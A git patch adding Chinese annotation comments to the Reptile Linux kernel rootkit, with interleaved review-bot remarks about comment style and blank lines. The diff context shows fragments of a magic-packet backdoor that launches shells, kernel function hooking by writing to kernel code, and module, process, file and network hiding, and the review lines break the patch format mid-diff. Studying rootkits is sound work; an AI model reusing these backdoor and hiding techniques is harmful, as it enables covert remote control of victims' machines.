From 644304d8796f5322f2c58699597424ae9f7a35d3 Mon Sep 17 00:00:00 2001
From: shenzexi <2538927534@qq.com>
Date: Mon, 21 Oct 2024 19:56:32 +0800
Subject: [PATCH] code reading

---
 src/Reptile/kernel/backdoor.c | 7 ++++---
 src/Reptile/kernel/dir.c | 1 +
 src/Reptile/kernel/encrypt/encrypt.c | 1 +
 src/Reptile/kernel/file.c | 1 +
 src/Reptile/kernel/khook/engine.c | 9 +++++----
 src/Reptile/kernel/khook/x86/hook.c | 13 +++++++------
 src/Reptile/kernel/kmatryoshka/kmatryoshka.c | 1 +
 src/Reptile/kernel/loader/loader.c | 1 +
 src/Reptile/kernel/module.c | 1 +
 src/Reptile/kernel/network.c | 1 +
 src/Reptile/kernel/proc.c | 1 +
 src/Reptile/kernel/string_helpers.c | 1 +
 src/Reptile/kernel/util.c | 1 +
 13 files changed, 26 insertions(+), 13 deletions(-)

diff --git a/src/Reptile/kernel/backdoor.c b/src/Reptile/kernel/backdoor.c
index 816672c..ff9beaa 100644
--- a/src/Reptile/kernel/backdoor.c
+++ b/src/Reptile/kernel/backdoor.c
@@ -1,3 +1,4 @@
+//后门程序,用于监听特定的网络数据包,并根据数据包的内容执行指定的命令
 #include
 #include
 #include
@@ -16,7 +17,7 @@ struct shell_task {
 char *ip;
 char *port;
 };
-
+//命令执行
 void shell_execer(struct work_struct *work)
 {
 struct shell_task *task = (struct shell_task *)work;
@@ -28,7 +29,7 @@ void shell_execer(struct work_struct *work)
 kfree(task->port);
 kfree(task);
 }
-
+//添加任务到命令执行队列
 int shell_exec_queue(char *ip, char *port)
 {
 struct shell_task *task;
@@ -58,7 +59,7 @@ int shell_exec_queue(char *ip, char *port)
 #define DROP 0
 #define ACCEPT 1
-
+//解析攻击方发送的网络数据包,并根据特定条件执行命令
 unsigned int magic_packet_parse(struct sk_buff *socket_buffer)
 {
 const struct iphdr *ip_header;
diff --git a/src/Reptile/kernel/dir.c b/src/Reptile/kernel/dir.c
index 35f1ef9..e011c98 100644
--- a/src/Reptile/kernel/dir.c
+++ b/src/Reptile/kernel/dir.c
@@ -1,3 +1,4 @@
+//判断文件夹是否隐藏
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/encrypt/encrypt.c b/src/Reptile/kernel/encrypt/encrypt.c
index dd01ead..c361f2e 100644
--- a/src/Reptile/kernel/encrypt/encrypt.c
+++ b/src/Reptile/kernel/encrypt/encrypt.c
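Review bot: The comments added to backdoor.c (`//后门程序…`, `//命令执行`, `//添加任务到命令执行队列`, `//解析攻击方发送的网络数据包…`) are in Chinese with no space after `//`, while the comments this tree already carries, e.g. `// len << PAGE_SIZE` in khook/engine.c and `// place a jump at addr @a from addr @f to addr @t` in khook/x86/hook.c, are English, so each touched file ends up mixing two comment languages and two comment shapes. I'd keep one language per file and the existing `// text` form, e.g. `// command execution` above `shell_execer` instead of `//命令执行`. Each of the three function-level comments also takes the place of the blank line that separated the previous definition (the `-` / `+//…` pairs at -16, -28 and -58), so the definitions now butt against each other; keep the blank line and add the comment below it. The same blank-line replacement recurs in every function-level hunk of khook/engine.c and khook/x86/hook.c, so this note covers those too.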
@@ -1,3 +1,4 @@
+////使用给定的十六进制密钥对文件内容进行加密
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/file.c b/src/Reptile/kernel/file.c
index 3cd7b84..c78609e 100644
--- a/src/Reptile/kernel/file.c
+++ b/src/Reptile/kernel/file.c
@@ -1,3 +1,4 @@
+//判断文件是否隐藏
 #include
 #include
diff --git a/src/Reptile/kernel/khook/engine.c b/src/Reptile/kernel/khook/engine.c
index d54d889..93f637d 100644
--- a/src/Reptile/kernel/khook/engine.c
+++ b/src/Reptile/kernel/khook/engine.c
@@ -1,9 +1,10 @@
+//内核级别的挂钩(hook)机制,主要用于在Linux内核中动态修改函数行为
 #include "internal.h"
 static khook_stub_t *khook_stub_tbl = NULL;
 ////////////////////////////////////////////////////////////////////////////////
-
+//通过内核符号表查找目标函数的地址
 static int khook_lookup_cb(long data[], const char *name, void *module, long addr)
 {
 int i = 0; while (!module && (((const char *)data[0]))[i] == name[i]) {
@@ -17,7 +18,7 @@ static void *khook_lookup_name(const char *name)
 kallsyms_on_each_symbol((void *)khook_lookup_cb, data);
 return (void *)data[1];
 }
-
+//将目标函数地址映射为可写内存,以便修改其代码
 static void *khook_map_writable(void *addr, size_t len)
 {
 struct page *pages[2] = { 0 }; // len << PAGE_SIZE
@@ -44,7 +45,7 @@ static void *khook_map_writable(void *addr, size_t len)
 #endif
 ////////////////////////////////////////////////////////////////////////////////
-
+//挂钩唤醒
 static void khook_wakeup(void)
 {
 struct task_struct *p;
@@ -54,7 +55,7 @@ static void khook_wakeup(void)
 }
 rcu_read_unlock();
 }
-
+//初始化和清理挂钩
 static int khook_sm_init_hooks(void *arg)
 {
 khook_t *p;
diff --git a/src/Reptile/kernel/khook/x86/hook.c b/src/Reptile/kernel/khook/x86/hook.c
index ae4076e..5cb5df3 100644
--- a/src/Reptile/kernel/khook/x86/hook.c
+++ b/src/Reptile/kernel/khook/x86/hook.c
@@ -1,3 +1,4 @@
+//内核中实现x86架构下的函数钩子(hook)
 #include "../internal.h"
 ////////////////////////////////////////////////////////////////////////////////
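Review bot: The header comment added to encrypt/encrypt.c opens with `////` where every other file in this patch uses `//`, which reads as a doubled marker rather than a deliberate choice; `// 使用给定的十六进制密钥对文件内容进行加密` keeps it consistent. The extra slashes are harmless to the compiler, but a reader scanning for the file's purpose line may take the four-slash form for one of the `////////…` separator bars used in khook/engine.c and khook/x86/hook.c.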
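Review bot: The comment `//初始化和清理挂钩` placed above `khook_sm_init_hooks` says the function both initialises and cleans up hooks, yet the name only speaks of initialisation, and the body lies outside the hunk, so nothing visible here supports the cleanup half. Unless a line elsewhere proves otherwise, narrow it to what the name states, `//初始化挂钩`, and document any separate cleanup routine where that routine is defined. The one-liner `//挂钩唤醒` in the preceding hunk likewise only restates `khook_wakeup` and tells the reader nothing the name does not.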
@@ -10,7 +11,7 @@ static struct {
 typeof(insn_init) *init;
 typeof(insn_get_length) *get_length;
 } khook_arch_lde;
-
+//初始化长度解析引擎
 static inline int khook_arch_lde_init(void) {
 khook_arch_lde.init = khook_lookup_name("insn_init");
 if (!khook_arch_lde.init) return -EINVAL;
@@ -18,7 +19,7 @@ static inline int khook_arch_lde_init(void) {
 if (!khook_arch_lde.get_length) return -EINVAL;
 return 0;
 }
-
+//获取指令长度
 static inline int khook_arch_lde_get_length(const void *p) {
 struct insn insn;
 int x86_64 = 0;
@@ -35,7 +36,7 @@ static inline int khook_arch_lde_get_length(const void *p) {
 }
 ////////////////////////////////////////////////////////////////////////////////
-
+//插入跳转指令
 // place a jump at addr @a from addr @f to addr @t
 static inline void x86_put_jmp(void *a, void *f, void *t)
 {
@@ -46,12 +47,12 @@ static inline void x86_put_jmp(void *a, void *f, void *t)
 static const char khook_stub_template[] = {
 # include KHOOK_STUB_FILE_NAME
 };
-
+//修复函数钩子中的占位符,
 static inline void stub_fixup(void *stub, const void *value) {
 while (*(int *)stub != 0xcacacaca) stub++;
 *(long *)stub = (long)value;
 }
-
+//初始化单个钩子
 static inline void khook_arch_sm_init_one(khook_t *hook) {
 khook_stub_t *stub = KHOOK_STUB(hook);
 if (hook->target.addr[0] == (char)0xE9 ||
@@ -73,7 +74,7 @@ static inline void khook_arch_sm_init_one(khook_t *hook) {
 }
 hook->orig = stub->orig; // the only link from hook to stub
 }
-
+//清理单个钩子
 static inline void khook_arch_sm_cleanup_one(khook_t *hook) {
 khook_stub_t *stub = KHOOK_STUB(hook);
 memcpy(hook->target.addr_map, stub->orig, stub->nbytes);
diff --git a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
index ef35a4a..3334de6 100644
--- a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
+++ b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
@@ -1,3 +1,4 @@
+//内核模块的初始化
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/loader/loader.c b/src/Reptile/kernel/loader/loader.c
index f9fc7a0..1267675 100644
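Review bot: `//插入跳转指令` lands directly above the existing `// place a jump at addr @a from addr @f to addr @t`, so `x86_put_jmp` now carries two one-line summaries in two languages that say the same thing. The existing line already names what each argument is for, so I'd drop the new one here, or merge any detail it adds into the English comment, rather than keep both. The body of `x86_put_jmp` continues outside the hunk.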
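Review bot: `//修复函数钩子中的占位符,` above `stub_fixup` ends in a comma and stops mid-sentence, so it is unclear what the reader is meant to take from it. The two body lines visible in the hunk scan for the marker value and then store `value` at that spot, so `//将存根中的占位符替换为传入的 value` completes the thought in the same register. `//初始化单个钩子` and `//清理单个钩子` in this and the following hunk read fine apart from the language and blank-line point raised on the first hunk of the patch.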
--- a/src/Reptile/kernel/loader/loader.c
+++ b/src/Reptile/kernel/loader/loader.c
@@ -1,3 +1,4 @@
+//加载所需模块
 #define _GNU_SOURCE
 #include
 #include
diff --git a/src/Reptile/kernel/module.c b/src/Reptile/kernel/module.c
index c05d436..e3b0fc7 100644
--- a/src/Reptile/kernel/module.c
+++ b/src/Reptile/kernel/module.c
@@ -1,3 +1,4 @@
+//内核模块隐藏
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/network.c b/src/Reptile/kernel/network.c
index 8f67975..9185d9a 100644
--- a/src/Reptile/kernel/network.c
+++ b/src/Reptile/kernel/network.c
@@ -1,3 +1,4 @@
+//网络地址隐藏
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/proc.c b/src/Reptile/kernel/proc.c
index a13d1e8..f1032fe 100644
--- a/src/Reptile/kernel/proc.c
+++ b/src/Reptile/kernel/proc.c
@@ -1,3 +1,4 @@
+//进程隐藏
 #include
 #include
 #include
diff --git a/src/Reptile/kernel/string_helpers.c b/src/Reptile/kernel/string_helpers.c
index 26a4edd..ecc23b4 100644
--- a/src/Reptile/kernel/string_helpers.c
+++ b/src/Reptile/kernel/string_helpers.c
@@ -1,3 +1,4 @@
+//获取命令行参数,转为可打印的字符
 #include "string_helpers.h"
 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 7, 0)
diff --git a/src/Reptile/kernel/util.c b/src/Reptile/kernel/util.c
index 8f846ce..7b859b4 100644
--- a/src/Reptile/kernel/util.c
+++ b/src/Reptile/kernel/util.c
@@ -1,3 +1,4 @@
+//访问和操作进程的命令行参数
 #include
 #include
 #include